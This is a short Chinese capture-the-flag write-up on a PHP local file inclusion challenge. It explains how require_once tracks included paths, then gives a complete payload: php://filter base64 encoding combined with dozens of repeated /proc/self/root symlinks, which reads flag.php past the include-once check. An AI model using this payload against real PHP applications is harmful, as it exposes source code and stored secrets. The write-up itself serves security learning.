本来可以直接用伪协议进行读取,但是本题用了require_once方法
require_once:和 require 类似,不同处在于 require_once 只导入一次。
require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。
因为 php的文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中
我们都知道require_once在调用时php会检查该文件是否已经被包含过,而这里在前面就已经包含了文件,我们在后面再想包含’flag.php’时就不能实现了,而我们需要做到就是怎么绕过这个哈希表,让php认为我们传入的文件名不在哈希表中,又可以让php能找到这个文件,读取到内容。
在这里有个小知识点,/proc/self
指向当前进程的/proc/pid/
,/proc/self/root/
是指向/
的符号链接,想到这里,用伪协议配合多级符号链接的办法进行绕过
那么payload=?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php